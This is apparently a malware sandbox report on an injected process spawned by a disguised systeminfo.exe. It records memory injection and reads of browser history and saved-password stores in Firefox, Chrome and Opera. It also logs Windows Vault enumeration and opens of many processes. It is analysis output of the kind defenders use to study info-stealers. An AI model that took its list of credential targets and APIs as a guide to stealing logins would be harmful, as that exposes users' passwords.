Monitor Start Time: 00:01:08, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:01:15
OS Process Information
+
Information Value
PID 0xa98
Parent PID 0x81c (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 964
0x 724
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000000a0000 0x000a0000 0x000a1fff Pagefile Backed Memory Readable True False False
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable True False False
rsaenh.dll 0x00140000 0x0017bfff Memory Mapped File Readable False False False
tzres.dll 0x00140000 0x00140fff Memory Mapped File Readable False False False
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000140000 0x00140000 0x00148fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000150000 0x00150000 0x00156fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000160000 0x00160000 0x00161fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000170000 0x00170000 0x00178fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000190000 0x00190000 0x0028ffff Private Memory Readable, Writable True False False
private_0x0000000000290000 0x00290000 0x0038ffff Private Memory Readable, Writable True False False
private_0x00000000003d0000 0x003d0000 0x003dffff Private Memory Readable, Writable True False False
private_0x0000000000400000 0x00400000 0x0045afff Private Memory Readable, Writable, Executable True False False
pagefile_0x0000000000460000 0x00460000 0x005e7fff Pagefile Backed Memory Readable True False False
private_0x0000000000630000 0x00630000 0x006affff Private Memory Readable, Writable True False False
pagefile_0x00000000006b0000 0x006b0000 0x00830fff Pagefile Backed Memory Readable True False False
private_0x0000000000880000 0x00880000 0x0097ffff Private Memory Readable, Writable True False False
private_0x00000000009b0000 0x009b0000 0x009effff Private Memory Readable, Writable True False False
private_0x0000000000a10000 0x00a10000 0x00b0ffff Private Memory Readable, Writable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c00000 0x00c00000 0x01ffffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x02000000 0x022cefff Memory Mapped File Readable False False False
private_0x00000000022d0000 0x022d0000 0x023d0fff Private Memory Readable, Writable True False False
nss3.dll 0x022d0000 0x02481fff Memory Mapped File Readable False False False
nss3.dll 0x022d0000 0x02481fff Memory Mapped File Readable False False False
private_0x00000000022d0000 0x022d0000 0x0240ffff Private Memory Readable, Writable True False False
private_0x00000000022d0000 0x022d0000 0x023cffff Private Memory Readable, Writable True False False
private_0x00000000023d0000 0x023d0000 0x0240ffff Private Memory Readable, Writable True False False
private_0x0000000002410000 0x02410000 0x0251ffff Private Memory Readable, Writable True False False
private_0x0000000002410000 0x02410000 0x0250ffff Private Memory Readable, Writable True False False
private_0x0000000002510000 0x02510000 0x0251ffff Private Memory Readable, Writable True False False
private_0x0000000002520000 0x02520000 0x0271ffff Private Memory Readable, Writable True False False
private_0x0000000002600000 0x02600000 0x026fffff Private Memory Readable, Writable True False False
pagefile_0x0000000002700000 0x02700000 0x02af2fff Pagefile Backed Memory Readable True False False
freebl3.dll 0x73c90000 0x73cdefff Memory Mapped File Readable, Writable, Executable False False False
freebl3.dll 0x73ca0000 0x73ceefff Memory Mapped File Readable, Writable, Executable False False False
softokn3.dll 0x73ce0000 0x73d06fff Memory Mapped File Readable, Writable, Executable False False False
nssdbm3.dll 0x73cf0000 0x73d06fff Memory Mapped File Readable, Writable, Executable False False False
softokn3.dll 0x73d10000 0x73d36fff Memory Mapped File Readable, Writable, Executable False False False
nssdbm3.dll 0x73d20000 0x73d36fff Memory Mapped File Readable, Writable, Executable False False False
msvcp100.dll 0x73d40000 0x73da8fff Memory Mapped File Readable, Writable, Executable False False False
mozglue.dll 0x73db0000 0x73dd1fff Memory Mapped File Readable, Writable, Executable False False False
msvcr100.dll 0x73de0000 0x73e9dfff Memory Mapped File Readable, Writable, Executable False False False
wsock32.dll 0x73ea0000 0x73ea6fff Memory Mapped File Readable, Writable, Executable False False False
nss3.dll 0x73eb0000 0x74064fff Memory Mapped File Readable, Writable, Executable False False False
vaultcli.dll 0x740e0000 0x740ebfff Memory Mapped File Readable, Writable, Executable False False False
atl.dll 0x74130000 0x74143fff Memory Mapped File Readable, Writable, Executable False False False
pstorec.dll 0x74150000 0x7415cfff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x74160000 0x74168fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742f0000 0x7448dfff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746e0000 0x746e7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x746f0000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74750000 0x7478efff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x74860000 0x74891fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74b30000 0x74b6afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74b70000 0x74b85fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x74eb0000 0x74eb4fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x74ec0000 0x750bafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x750c0000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75350000 0x75444fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x75890000 0x758c4fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x758d0000 0x759ecfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x75bd0000 0x75c4afff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75c50000 0x76899fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76b60000 0x76beefff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76c40000 0x76d75fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True False False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x77240000 0x77245fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x8b4 address = 0x400000, size = 372736 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x8b4 address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x8b4 address = 0x7efdf010, size = 4 True 1
Fn
Data
Modify Control Flow #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x8b4 os_tid = 0x964, address = 0x0 True 1
Fn
Host Behavior
File (639)
+
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\ProgramData\FB70.tmp desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo_lng.ini type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\history.dat type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini type = file_attributes True 1
Fn
Get Info C:\Program Files (x86)\Mozilla Firefox\nss3.dll type = file_attributes True 3
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\logins.json type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite type = file_attributes True 1
Fn
Get Info C:\Program Files (x86)\Mozilla Firefox\sqlite3.dll type = file_attributes False 1
Fn
Get Info C:\Program Files (x86)\Mozilla Firefox\mozsqlite3.dll type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini type = file_attributes False 1
Fn
Get Info C:\Program Files (x86)\Sea Monkey\nss3.dll type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data type = file_attributes True 1
Fn
Get Info - type = size, size_out = 0 True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data type = file_attributes True 1
Fn
Get Info - type = size, size_out = 0 True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\pnacl\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\pnacl\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Apple Computer\Preferences\keychain.plist type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Opera\Opera\wand.dat type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Opera\Opera7\profile\wand.dat type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Opera Software\Opera Stable\Login Data type = file_attributes False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 8, size_out = 8 True 51
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 256, size_out = 256 True 89
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 384, size_out = 384 True 5
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat size = 8, size_out = 8 True 93
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat size = 8, size_out = 8 True 64
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 8, size_out = 8 True 69
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat size = 8, size_out = 8 True 93
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat size = 8, size_out = 8 True 94
Fn
Data
Write C:\ProgramData\FB70.tmp size = 3 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 1 True 8
Fn
Data
Write C:\ProgramData\FB70.tmp size = 11 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 9 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 8 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 17 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 15 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 14 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 12 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 13 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 2 True 1
Fn
Data
Registry (15)
+
Operation Key Additional Information Success Count Logfile
Open Key Mozilla Firefox\bin - False 3
Fn
Open Key Mozilla Firefox 25.0\bin - True 1
Fn
Open Key Mozilla Firefox 25.0\bin - True 1
Fn
Open Key Mozilla Firefox 25.0\bin - True 1
Fn
Read Value Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Read Value Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Read Value Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Enumerate Keys - - True 3
Fn
Enumerate Keys - - False 3
Fn
Process (40)
+
Operation Process Additional Information Success Count Logfile
Get filename c:\windows\system32\dwm.exe file_name = C:\Windows\System32\dwm.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Get filename c:\windows\explorer.exe file_name = C:\Windows\explorer.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Get filename c:\program files\microsoft office\root\office16\onenotem.exe file_name = C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE, flags = PROCESS_NAME_WIN32 True 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files\microsoft office\root\office16\onenotem.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files (x86)\java\turner_construction_solve_cialis.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\internet explorer\efforts-extreme-quantity-reproductive.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\msbuild\los-talks-ooo-focusing.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft onedrive\farehave.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\rundll32.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\common files\characters appointed birthday finally.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\msbuild\ausarrivedrepresentative.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows media player\routing.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\dvd maker\cliff-filter.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows defender\canvas.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\common files\cookie_cumulative_bennett_horse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows sidebar\pie.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft office\located-purple-team.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft office\pagespresent.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\java\diamond_hospitals_designs_www.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\mozilla firefox\later_pet_handjobs.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\internet explorer\instrumentationendorsementcivilizationcommentary.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\common files\literally.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows nt\dimensionalsubscriptions.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\common files\eaglesfilterscrimes.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows photo viewer\multimedia-channel-letter-standards.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\java\analysts-dose.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\uninstall information\manufacturer-asset.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft office\root\office16\winword.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\sppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Module (69)
+
Operation Module Additional Information Success Count Logfile
Load comctl32.dll base_address = 0x742f0000 True 1
Fn
Load shell32.dll base_address = 0x75c50000 True 1
Fn
Load pstorec.dll base_address = 0x74150000 True 1
Fn
Load vaultcli.dll base_address = 0x740e0000 True 1
Fn
Load C:\Program Files (x86)\Mozilla Firefox\nss3.dll base_address = 0x73eb0000 True 1
Fn
Get Handle private_0x0000000000400000 base_address = 0x400000 True 22
Fn
Get Handle C:\Program Files (x86)\Mozilla Firefox\nss3.dll base_address = 0x0 False 1
Fn
Get Handle c:\program files (x86)\mozilla firefox\nss3.dll base_address = 0x73eb0000 True 2
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x759f0000 True 2
Fn
Get Filename - process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 True 2
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll function = InitCommonControlsEx, address_out = 0x743109ce True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x75c70468 True 1
Fn
Get Address c:\windows\syswow64\pstorec.dll function = PStoreCreateInstance, address_out = 0x7415526c True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultOpenVault, address_out = 0x740e26a9 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultCloseVault, address_out = 0x740e2718 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultEnumerateItems, address_out = 0x740e3099 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultFree, address_out = 0x740e4321 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultGetInformation, address_out = 0x740e24c0 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultGetItem, address_out = 0x740e3242 True 2
Fn
